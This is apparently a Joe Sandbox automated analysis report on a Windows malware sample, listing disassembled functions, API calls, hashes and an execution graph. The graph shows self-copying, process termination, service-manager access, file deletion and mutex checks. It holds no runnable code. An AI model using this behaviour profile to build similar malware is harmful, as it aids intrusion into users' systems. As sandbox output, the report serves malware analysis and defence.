                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFileHandle$CreateMutexReadRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1760212717-0
                                                                                                                                                                                                            • Opcode ID: 3d534696c6e2fb3e9828526f86848338571ca5e1be7cbd6b450027837ff8df9b
                                                                                                                                                                                                            • Instruction ID: b53dfed79cce73865776e9820254b5fbdbd8f5860e03451f709f7cc4fa9efc8e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d534696c6e2fb3e9828526f86848338571ca5e1be7cbd6b450027837ff8df9b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54B16A71A00600DBCB04AF64FC85B693BB5FBD8711F218156E54597EF1EB709AE4CB82
                                                                                                                                                                                                            Function 001568D0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,001503A9,00000000,?), ref: 00156957
                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,001503A9,00000000), ref: 0015695E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,001503A9,00000000,?), ref: 001569C8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,001503A9,00000000,?), ref: 001569CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
                                                                                                                                                                                                            • Instruction ID: 5fe13a9a5083639da10640ce7b551ac2f636f8185c7407b44799b024cbd98ca6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED21AEB2605204DFD7049F61FE8A9503F78F785310B624619E98693DB4E73199E1CF90
                                                                                                                                                                                                            Function 001750E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(0016247D,00000001,?,?,0016247D), ref: 0017518C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 001752BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountSystemTickTime
                                                                                                                                                                                                            • String ID: @AB
                                                                                                                                                                                                            • API String ID: 2164215191-841575833
                                                                                                                                                                                                            • Opcode ID: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
                                                                                                                                                                                                            • Instruction ID: 82845a754f6ede21e7eb08de9a3fb57ff9c2689891cd13d6accb8e7c52fc6a73
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0451DE72A00A11CFC308DF69FD899253BB6F7987003464116E48AC7EB4EB748AE4CB85

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:7.1%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:1712
                                                                                                                                                                                                            Total number of Limit Nodes:17
                                                                                                                                                                                                            execution_graph 10364 a4a0a6 10372 a4a0b0 10364->10372 10365 a46810 8 API calls 10365->10372 10366 a4a5a1 10371 a41bb0 2 API calls 10366->10371 10367 a46810 8 API calls 10369 a4a428 10367->10369 10368 a31ca0 9 API calls 10368->10369 10369->10366 10369->10367 10369->10368 10370 a31ca0 9 API calls 10370->10372 10373 a4a606 10371->10373 10372->10365 10372->10369 10372->10370 11408 a33520 11409 a3353f 11408->11409 11410 a468d0 4 API calls 11409->11410 11411 a3355e 11409->11411 11410->11411 11194 a4c9a0 11195 a4c9be 11194->11195 11200 a3d500 lstrlen 11195->11200 11197 a4c9fd 11201 a3df70 11197->11201 11200->11197 11204 a50b70 11201->11204 11203 a3df8a 11205 a50baf 11204->11205 11206 a50ca8 11205->11206 11207 a50c9b 11205->11207 11210 a50ca6 11206->11210 11211 a3e320 11206->11211 11208 a466f0 8 API calls 11207->11208 11208->11210 11210->11203 11212 a3e334 11211->11212 11213 a53f00 8 API calls 11212->11213 11214 a3e3ce 11213->11214 11214->11210 11412 a3ab27 11415 a3ab30 11412->11415 11413 a3acfe 11414 a53a80 4 API calls 11414->11415 11415->11413 11415->11414 10374 a522a0 10375 a522fb 10374->10375 10376 a650e0 3 API calls 10375->10376 10377 a5247d 10376->10377 10378 a59580 10 API calls 10377->10378 10379 a524c2 10378->10379 10380 a3e430 lstrlen 10379->10380 10381 a524e6 10380->10381 10382 a32f90 2 API calls 10381->10382 10383 a52511 10382->10383 10384 a41bb0 2 API calls 10383->10384 10402 a52561 10384->10402 10385 a608b0 GetSystemTimeAsFileTime 10385->10402 10386 a4d990 8 API calls 10387 a52bec Sleep 10386->10387 10419 a48cf0 10387->10419 10389 a42120 5 API calls 10389->10402 10390 a5fa80 3 API calls 10390->10402 10392 a41200 12 API calls 10392->10402 10393 a41bb0 GetProcessHeap RtlFreeHeap 10393->10402 10394 a3d760 51 API calls 10394->10402 10395 a4d0f0 31 API calls 10395->10402 10396 a3d530 9 API calls 10396->10402 10397 a61050 8 API calls 10397->10402 10398 a42c30 8 API calls 10398->10402 10400 a32f90 GetProcessHeap RtlAllocateHeap 10400->10402 10401 a50d80 22 API calls 10401->10402 10402->10385 10402->10386 10402->10389 10402->10390 10402->10392 10402->10393 10402->10394 10402->10395 10402->10396 10402->10397 10402->10398 10402->10400 10402->10401 10403 a54af0 10402->10403 10415 a4c770 10402->10415 10404 a54b32 10403->10404 10405 a32f90 2 API calls 10404->10405 10406 a54b55 10405->10406 10407 a32f90 2 API calls 10406->10407 10408 a54b78 10407->10408 10426 a471e0 10408->10426 10411 a41bb0 2 API calls 10412 a54bb0 10411->10412 10413 a41bb0 2 API calls 10412->10413 10414 a54bc5 10413->10414 10414->10402 10416 a4c79b 10415->10416 10417 a44290 8 API calls 10416->10417 10418 a4c86a 10416->10418 10417->10418 10418->10402 10423 a48d16 10419->10423 10420 a48f44 10420->10402 10421 a48dca DeleteFileA 10421->10423 10423->10420 10423->10421 10424 a48ee8 10423->10424 10432 a31c30 10423->10432 10424->10420 10437 a47d40 10424->10437 10427 a47202 10426->10427 10428 a32f90 2 API calls 10427->10428 10429 a47648 10428->10429 10430 a41bb0 2 API calls 10429->10430 10431 a47684 10430->10431 10431->10411 10441 a3f270 10432->10441 10434 a31c6a 10445 a4d720 10434->10445 10438 a47d69 10437->10438 10440 a47e27 10438->10440 10460 a3bba0 10438->10460 10440->10424 10442 a3f29a 10441->10442 10443 a40110 8 API calls 10442->10443 10444 a3f2a2 10443->10444 10444->10434 10446 a4d72e 10445->10446 10447 a31c70 10446->10447 10449 a42a80 10446->10449 10447->10423 10452 a3e100 10449->10452 10451 a42a8f 10451->10447 10453 a3e111 10452->10453 10456 a31000 10453->10456 10455 a3e127 10455->10451 10457 a3100b 10456->10457 10458 a53f00 8 API calls 10457->10458 10459 a31068 10458->10459 10459->10455 10463 a530b0 10460->10463 10464 a530e4 10463->10464 10467 a466f0 10464->10467 10466 a3bbae 10466->10440 10468 a4670d 10467->10468 10469 a40110 8 API calls 10468->10469 10470 a46738 10469->10470 10470->10466 9428 a545a9 9429 a545bd 9428->9429 9436 a50610 9429->9436 9433 a545ee 9434 a54656 9433->9434 9435 a54672 ExitProcess 9434->9435 9437 a5062b 9436->9437 9443 a3b690 9437->9443 9439 a50660 9440 a5fde0 9439->9440 9441 a5fe12 GetStdHandle GetStdHandle GetStdHandle 9440->9441 9442 a5fdf7 9440->9442 9441->9433 9442->9441 9444 a3b6b6 GetProcessHeap HeapAlloc 9443->9444 9444->9439 10639 a3a830 10642 a4b720 10639->10642 10641 a3a83f 10643 a4b72e 10642->10643 10646 a3d500 lstrlen 10643->10646 10645 a4b739 10645->10641 10646->10645 11416 a31130 11417 a3114b 11416->11417 11418 a54420 8 API calls 11417->11418 11419 a3115b 11418->11419 11420 a3f330 11423 a3d500 lstrlen 11420->11423 11422 a3f38f 11423->11422 11424 a3fb30 11425 a42df0 8 API calls 11424->11425 11426 a3fb55 11425->11426 10479 a47eb0 10480 a47ec0 10479->10480 10481 a47eba 10479->10481 10482 a42eb0 2 API calls 10481->10482 10482->10480 11215 a429b0 11218 a4e140 11215->11218 11219 a4e158 11218->11219 11220 a50b00 8 API calls 11219->11220 11221 a429d1 11220->11221 10483 a64eb3 10484 a64ec5 10483->10484 10486 a37a04 132 API calls 10484->10486 10485 a64ec9 10486->10485 10487 a32080 10488 a32097 10487->10488 10491 a50790 10488->10491 10492 a50a0d 10491->10492 10493 a507cb 10491->10493 10509 a3a850 10492->10509 10495 a507e5 10493->10495 10496 a50926 10493->10496 10500 a4d9a0 10495->10500 10497 a4d9a0 4 API calls 10496->10497 10499 a321e4 10497->10499 10502 a4d9c5 10500->10502 10501 a4da26 10501->10499 10502->10501 10506 a4dadb 10502->10506 10517 a42c90 10502->10517 10503 a42c90 4 API calls 10504 a4db90 10503->10504 10522 a31170 10504->10522 10506->10503 10506->10504 10510 a3a8dc 10509->10510 10511 a3aa1a 10510->10511 10512 a42c90 4 API calls 10510->10512 10513 a53a80 4 API calls 10511->10513 10514 a3acfe 10511->10514 10512->10511 10515 a3aa81 10513->10515 10514->10499 10515->10514 10516 a53a80 4 API calls 10515->10516 10516->10515 10519 a42cb9 10517->10519 10518 a42ce0 10518->10506 10519->10518 10526 a53a80 10519->10526 10521 a42d76 10521->10506 10524 a3119e 10522->10524 10523 a31396 10523->10499 10524->10523 10525 a42eb0 2 API calls 10524->10525 10525->10524 10527 a53ab7 10526->10527 10529 a53ae7 10526->10529 10528 a3e2c0 2 API calls 10527->10528 10530 a53ade 10528->10530 10529->10521 10530->10529 10531 a42eb0 2 API calls 10530->10531 10531->10529 10532 a31080 10533 a3108b 10532->10533 10536 a50b00 10533->10536 10535 a31117 10537 a53f00 8 API calls 10536->10537 10538 a50b1c 10537->10538 10538->10535 11222 a3c980 11223 a3c99d 11222->11223 11224 a3e2c0 2 API calls 11223->11224 11225 a3c9f6 11224->11225 11431 a41500 11434 a4ee60 11431->11434 11435 a4b720 lstrlen 11434->11435 11436 a4150f 11435->11436 11437 a3a307 11438 a3a310 Sleep 11437->11438 11438->11438 11439 a3bd08 11440 a3bd10 11439->11440 11441 a3a4e0 lstrlen 11440->11441 11442 a3bdbb OpenProcess 11440->11442 11443 a3bedd Process32Next 11440->11443 11445 a3be67 CloseHandle 11440->11445 11441->11440 11442->11440 11444 a3be02 TerminateProcess 11442->11444 11443->11440 11446 a3bf19 CloseHandle 11443->11446 11444->11440 11444->11445 11445->11440 11448 a3bf47 11446->11448 9446 a64f8a 9447 a64ec5 9446->9447 9450 a37a04 9447->9450 9688 a41bb0 9450->9688 9454 a37a60 9455 a41bb0 2 API calls 9454->9455 9456 a37aa7 9455->9456 9457 a32f90 2 API calls 9456->9457 9458 a37b0e 9457->9458 9459 a41bb0 2 API calls 9458->9459 9460 a37b22 9459->9460 9461 a32f90 2 API calls 9460->9461 9462 a37bad 9461->9462 9463 a41bb0 2 API calls 9462->9463 9464 a37bc3 9463->9464 9465 a32f90 2 API calls 9464->9465 9466 a37c07 9465->9466 9467 a41bb0 2 API calls 9466->9467 9468 a37c7a 9467->9468 9469 a32f90 2 API calls 9468->9469 9470 a37cb7 9469->9470 9471 a41bb0 2 API calls 9470->9471 9472 a37d1b 9471->9472 9473 a32f90 2 API calls 9472->9473 9474 a37d90 9473->9474 9475 a41bb0 2 API calls 9474->9475 9476 a37da6 9475->9476 9477 a32f90 2 API calls 9476->9477 9478 a37dfc 9477->9478 9479 a41bb0 2 API calls 9478->9479 9480 a37e1a 9479->9480 9481 a32f90 2 API calls 9480->9481 9482 a37e73 9481->9482 9483 a41bb0 2 API calls 9482->9483 9484 a37e87 9483->9484 9485 a32f90 2 API calls 9484->9485 9486 a37ef1 9485->9486 9487 a41bb0 2 API calls 9486->9487 9488 a37f05 9487->9488 9489 a32f90 2 API calls 9488->9489 9490 a37f42 9489->9490 9491 a41bb0 2 API calls 9490->9491 9492 a37f62 9491->9492 9493 a32f90 2 API calls 9492->9493 9494 a37fe8 9493->9494 9495 a41bb0 2 API calls 9494->9495 9496 a38004 9495->9496 9497 a32f90 2 API calls 9496->9497 9498 a38093 9497->9498 9499 a41bb0 2 API calls 9498->9499 9500 a380a7 9499->9500 9501 a32f90 2 API calls 9500->9501 9502 a38106 9501->9502 9503 a41bb0 2 API calls 9502->9503 9504 a3818f 9503->9504 9505 a32f90 2 API calls 9504->9505 9506 a381d1 9505->9506 9507 a41bb0 2 API calls 9506->9507 9508 a381eb 9507->9508 9509 a32f90 2 API calls 9508->9509 9510 a38230 9509->9510 9511 a41bb0 2 API calls 9510->9511 9512 a38268 9511->9512 9513 a41bb0 2 API calls 9512->9513 9514 a382b6 9513->9514 9696 a42eb0 GetProcessHeap RtlFreeHeap 9514->9696 9518 a3839b 9519 a32f90 2 API calls 9518->9519 9520 a383c0 GetEnvironmentVariableA 9519->9520 9521 a41bb0 2 API calls 9520->9521 9522 a383f9 CreateMutexA 9521->9522 9524 a38480 CreateMutexA CreateMutexA 9522->9524 9526 a38521 9524->9526 9527 a38587 GetTickCount 9526->9527 9528 a3868b 9526->9528 9530 a385a5 9527->9530 9705 a45200 9528->9705 9532 a32f90 2 API calls 9530->9532 9531 a386a4 GetCommandLineA 9533 a386cb 9531->9533 9535 a385bd 9532->9535 9534 a32f90 2 API calls 9533->9534 9536 a3874d 9534->9536 9537 a41bb0 2 API calls 9535->9537 9539 a41bb0 2 API calls 9536->9539 9538 a38622 9537->9538 9538->9528 9540 a3878c 9539->9540 9541 a39235 GetCommandLineA 9540->9541 9543 a32f90 2 API calls 9540->9543 9858 a5b990 9541->9858 9545 a387dd 9543->9545 9546 a41bb0 2 API calls 9545->9546 9549 a38812 9546->9549 9547 a392f3 9861 a3d500 lstrlen 9547->9861 9548 a39271 9548->9547 9550 a38842 9549->9550 9552 a32800 ExitProcess 9549->9552 9555 a32f90 2 API calls 9550->9555 9552->9550 9553 a39323 GetModuleFileNameA 9862 a3a4e0 lstrlen 9553->9862 9556 a388ab 9555->9556 9558 a41bb0 2 API calls 9556->9558 9557 a393ae 9560 a3a4e0 lstrlen 9557->9560 9559 a388db 9558->9559 9561 a38926 9559->9561 9563 a32800 ExitProcess 9559->9563 9562 a3945a 9560->9562 9807 a3e430 9561->9807 9564 a3a4e0 lstrlen 9562->9564 9563->9561 9579 a3947b 9564->9579 9567 a32f90 2 API calls 9568 a38978 9567->9568 9572 a41bb0 2 API calls 9568->9572 9569 a39744 9884 a53cf0 9569->9884 9571 a397b2 9573 a397d4 9571->9573 9574 a32800 ExitProcess 9571->9574 9594 a389cb 9572->9594 9893 a59b00 9573->9893 9574->9573 9576 a3981d 9577 a608b0 GetSystemTimeAsFileTime 9576->9577 9578 a39830 9577->9578 9987 a548d0 9578->9987 9579->9569 9864 a48a70 9579->9864 9581 a3956f 9870 a59580 9581->9870 9586 a3971a 9587 a32800 ExitProcess 9586->9587 9587->9569 9589 a38b61 Sleep 9598 a38b90 9589->9598 9590 a3958b 9590->9586 9591 a32f90 2 API calls 9590->9591 9592 a39651 9591->9592 9883 a3d500 lstrlen 9592->9883 9594->9589 9595 a38c99 Sleep 9594->9595 9614 a38cd8 9594->9614 9812 a42120 9594->9812 9823 a41530 9594->9823 9834 a608b0 GetSystemTimeAsFileTime 9594->9834 9595->9594 9596 a41530 5 API calls 9596->9598 9597 a39666 MessageBoxA 9601 a41bb0 2 API calls 9597->9601 9598->9594 9598->9596 9600 a42120 5 API calls 9600->9614 9603 a396ef 9601->9603 9602 a398a8 9608 a32f90 2 API calls 9602->9608 9612 a399ff 9602->9612 9606 a32800 ExitProcess 9603->9606 9604 a38de6 9605 a41530 5 API calls 9604->9605 9607 a38e04 9605->9607 9606->9586 9617 a391b3 9607->9617 9618 a38e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9607->9618 9611 a399e4 9608->9611 9610 a38d8c Sleep 9610->9614 9991 a3c540 9611->9991 9613 a39a71 9612->9613 9996 a4ee80 9612->9996 9622 a39aa3 CloseHandle SetFileAttributesA CopyFileA 9613->9622 9643 a39d65 9613->9643 9614->9600 9614->9604 9836 a3bbc0 9614->9836 9850 a5fa80 9617->9850 9620 a32f90 2 API calls 9618->9620 9619 a39a32 9621 a39a53 9619->9621 9623 a32800 ExitProcess 9619->9623 9633 a38eff 9620->9633 10007 a326e0 9621->10007 9625 a39c78 9622->9625 9626 a39b1a SetFileAttributesA 9622->9626 9623->9621 10037 a53110 9625->10037 9628 a39b73 9626->9628 9629 a39b5d 9626->9629 9636 a39c2a Sleep 9628->9636 10027 a47a50 9628->10027 10015 a40500 OpenSCManagerA 9629->10015 9630 a39210 9855 a32800 9630->9855 9634 a41bb0 2 API calls 9633->9634 9638 a38f61 9634->9638 9640 a5fa80 3 API calls 9636->9640 9637 a42120 5 API calls 9637->9643 9646 a32f90 2 API calls 9638->9646 9662 a3904a 9638->9662 9640->9625 9642 a39e57 SetFileAttributesA CopyFileA SetFileAttributesA 9652 a3e430 lstrlen 9642->9652 9643->9637 9643->9642 9644 a3bbc0 8 API calls 9643->9644 9651 a39e1a Sleep 9644->9651 9657 a38fbf 9646->9657 9647 a39113 SetFileAttributesA 9653 a391a4 9647->9653 9648 a3913d SetFileAttributesA 9648->9653 9650 a32800 ExitProcess 9650->9643 9651->9642 9651->9643 9655 a39ee1 9652->9655 9653->9617 9656 a32f90 2 API calls 9655->9656 9659 a39efd 9656->9659 9658 a41bb0 2 API calls 9657->9658 9658->9662 9660 a32f90 2 API calls 9659->9660 9661 a39fbe 9660->9661 9663 a41bb0 2 API calls 9661->9663 9662->9647 9662->9648 9664 a3a039 9663->9664 10041 a40dc0 9664->10041 9666 a3a050 9667 a41bb0 2 API calls 9666->9667 9668 a3a06b 9667->9668 10045 a41200 9668->10045 9671 a32f90 2 API calls 9672 a3a0ae 9671->9672 9673 a32f90 2 API calls 9672->9673 9674 a3a0c6 9673->9674 10066 a65820 9674->10066 9676 a3a0f2 9677 a41bb0 2 API calls 9676->9677 9678 a3a115 9677->9678 9679 a41bb0 2 API calls 9678->9679 9680 a3a127 9679->9680 9681 a5fa80 3 API calls 9680->9681 9682 a3a185 9681->9682 9683 a3a24e CreateThread 9682->9683 9684 a3a2a2 9683->9684 9685 a3a2cd 9683->9685 10069 a3c660 StartServiceCtrlDispatcherA 9684->10069 9687 a3a310 Sleep 9685->9687 9687->9687 9689 a41bd0 9688->9689 9690 a42eb0 2 API calls 9689->9690 9691 a37a18 9690->9691 9692 a32f90 9691->9692 9693 a32feb 9692->9693 10070 a3e2c0 9693->10070 9695 a33034 9695->9454 9697 a38388 9696->9697 9698 a650e0 9697->9698 9699 a65186 GetSystemTime 9698->9699 9700 a65172 9698->9700 9701 a651be 9699->9701 9700->9699 9702 a608b0 GetSystemTimeAsFileTime 9701->9702 9703 a652a7 GetTickCount 9702->9703 9704 a652d4 9703->9704 9704->9518 9706 a4521d 9705->9706 9707 a452b2 GetVersionExA 9706->9707 10073 a3b7a0 AllocateAndInitializeSid 9707->10073 9713 a32f90 2 API calls 9714 a45652 9713->9714 10093 a3d530 9714->10093 9717 a41bb0 2 API calls 9722 a45692 9717->9722 9718 a45496 CreateDirectoryA 9720 a32f90 2 API calls 9718->9720 9719 a45357 9719->9718 9721 a454bb 9720->9721 9723 a41bb0 2 API calls 9721->9723 10097 a41d90 9722->10097 9725 a4550a 9723->9725 9725->9713 9726 a456cb 9727 a456d6 DeleteFileA RemoveDirectoryA 9726->9727 9728 a4575d 9726->9728 9727->9728 9729 a3f0d0 6 API calls 9728->9729 9730 a45776 9729->9730 9731 a4581e CreateDirectoryA 9730->9731 9732 a4585b 9731->9732 9733 a3e430 lstrlen 9732->9733 9734 a458cb CreateDirectoryA 9733->9734 9735 a45917 9734->9735 9736 a32f90 2 API calls 9735->9736 9737 a4592d 9736->9737 9738 a32f90 2 API calls 9737->9738 9739 a459e9 9738->9739 9740 a41bb0 2 API calls 9739->9740 9741 a45a07 9740->9741 9742 a3d530 9 API calls 9741->9742 9743 a45a77 9742->9743 9744 a41bb0 2 API calls 9743->9744 9745 a45aaa 9744->9745 9746 a41d90 5 API calls 9745->9746 9747 a45ad7 9746->9747 9748 a464f5 9747->9748 9749 a45b07 9747->9749 9750 a45c42 9747->9750 9753 a3e430 lstrlen 9748->9753 9752 a32f90 2 API calls 9749->9752 9751 a32f90 2 API calls 9750->9751 9754 a45c61 9751->9754 9755 a45b2d 9752->9755 9756 a46549 SetFileAttributesA 9753->9756 9757 a65820 wvsprintfA 9754->9757 9758 a65820 wvsprintfA 9755->9758 9764 a4657e 9756->9764 9759 a45c87 9757->9759 9760 a45b5a 9758->9760 9761 a41bb0 2 API calls 9759->9761 9762 a41bb0 2 API calls 9760->9762 9763 a45b9f 9761->9763 9762->9763 9765 a45bea 9763->9765 9764->9531 9766 a45d53 CreateDirectoryA 9765->9766 9767 a45d9a 9766->9767 9768 a3e430 lstrlen 9767->9768 9769 a45e4f CreateDirectoryA 9768->9769 9770 a32f90 2 API calls 9769->9770 9771 a45e9e 9770->9771 9772 a32f90 2 API calls 9771->9772 9773 a45f4c 9772->9773 9774 a41bb0 2 API calls 9773->9774 9775 a45f68 9774->9775 9776 a3d530 9 API calls 9775->9776 9777 a45f86 9776->9777 9778 a41bb0 2 API calls 9777->9778 9779 a45fcf 9778->9779 9780 a41d90 5 API calls 9779->9780 9781 a46002 9780->9781 9782 a46485 9781->9782 9783 a4600d GetTempPathA 9781->9783 9782->9748 10113 a3d500 lstrlen 9783->10113 9785 a4604f 9786 a3e430 lstrlen 9785->9786 9787 a461cb CreateDirectoryA 9786->9787 9789 a46219 9787->9789 9790 a32f90 2 API calls 9789->9790 9791 a46237 9790->9791 9792 a32f90 2 API calls 9791->9792 9793 a462be 9792->9793 9794 a41bb0 2 API calls 9793->9794 9795 a46302 9794->9795 9796 a3d530 9 API calls 9795->9796 9797 a46360 9796->9797 9798 a41bb0 2 API calls 9797->9798 9799 a46372 9798->9799 9800 a41d90 5 API calls 9799->9800 9801 a463b5 9800->9801 9801->9782 9802 a463c0 GetTempPathA 9801->9802 9803 a463ff 9802->9803 9804 a32f90 2 API calls 9803->9804 9805 a4642d 9804->9805 9806 a41bb0 2 API calls 9805->9806 9806->9782 9808 a548d0 lstrlen 9807->9808 9809 a3e451 9808->9809 9810 a38961 9809->9810 10152 a3d500 lstrlen 9809->10152 9810->9567 9813 a42196 CreateToolhelp32Snapshot 9812->9813 9814 a4218c 9812->9814 9815 a421fe Process32First 9813->9815 9816 a42450 9813->9816 9814->9813 9818 a4240d FindCloseChangeNotification 9815->9818 9820 a4227a 9815->9820 9816->9594 9818->9816 9819 a3a4e0 lstrlen 9819->9820 9820->9819 9821 a42346 Process32Next 9820->9821 9822 a4239c 9820->9822 9821->9820 9821->9822 9822->9818 9824 a41561 9823->9824 9825 a4157f CreateFileA 9823->9825 9824->9825 9826 a41611 9825->9826 9827 a41657 9826->9827 9828 a41673 GetFileTime 9826->9828 9827->9594 9829 a41694 CloseHandle 9828->9829 9830 a416bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9828->9830 9829->9594 9831 a41771 GetFileSize CloseHandle 9830->9831 9832 a4174d 9830->9832 9833 a417be 9831->9833 9832->9831 9833->9594 9835 a60958 __aulldiv 9834->9835 9835->9594 9837 a3bbe1 CreateToolhelp32Snapshot 9836->9837 9839 a3bcbb Process32First 9837->9839 9841 a3bf47 9837->9841 9840 a3bf1a CloseHandle 9839->9840 9843 a3bd05 9839->9843 9840->9841 9841->9610 9842 a3a4e0 lstrlen 9842->9843 9843->9842 9844 a3bdbb OpenProcess 9843->9844 9845 a3bedd Process32Next 9843->9845 9844->9843 9846 a3be02 TerminateProcess 9844->9846 9845->9843 9849 a3bf19 9845->9849 9847 a3be67 CloseHandle 9846->9847 9848 a3be4a 9846->9848 9847->9843 9847->9848 9848->9843 9848->9847 9849->9840 9851 a5faaa 9850->9851 9852 a5fb6a CreateProcessA 9851->9852 9853 a5fc8f 9852->9853 9854 a5fbff CloseHandle CloseHandle 9852->9854 9853->9630 9854->9630 9856 a3281d 9855->9856 9857 a3283e ExitProcess 9856->9857 10153 a3d500 lstrlen 9858->10153 9860 a5b9c3 9860->9548 9861->9553 9863 a3a53c 9862->9863 9863->9557 9865 a48a95 9864->9865 10154 a3ca40 9865->10154 9867 a48b1d 9868 a5fa80 3 API calls 9867->9868 9869 a48b65 9868->9869 9869->9581 9871 a59902 9870->9871 9872 a595a9 9870->9872 9871->9590 10192 a3d500 lstrlen 9872->10192 9874 a5965d Sleep 9875 a596b9 9874->9875 9876 a32f90 2 API calls 9875->9876 9877 a596e9 9876->9877 9878 a41bb0 2 API calls 9877->9878 9879 a5979d FindFirstFileA 9878->9879 9880 a597d6 9879->9880 9880->9871 9881 a59877 DeleteFileA FindNextFileA 9880->9881 9881->9880 9882 a598d9 FindClose 9881->9882 9882->9871 9883->9597 9885 a53d35 9884->9885 9886 a3e430 lstrlen 9885->9886 9887 a53d66 9886->9887 9888 a32f90 2 API calls 9887->9888 9889 a53d82 9888->9889 9890 a41bb0 2 API calls 9889->9890 9891 a53dd1 CreateFileA 9890->9891 9892 a53e32 9891->9892 9892->9571 9895 a59b93 9893->9895 9894 a59c40 GetComputerNameA 9896 a59cbb 9894->9896 9897 a59c53 9894->9897 9895->9894 9900 a32f90 2 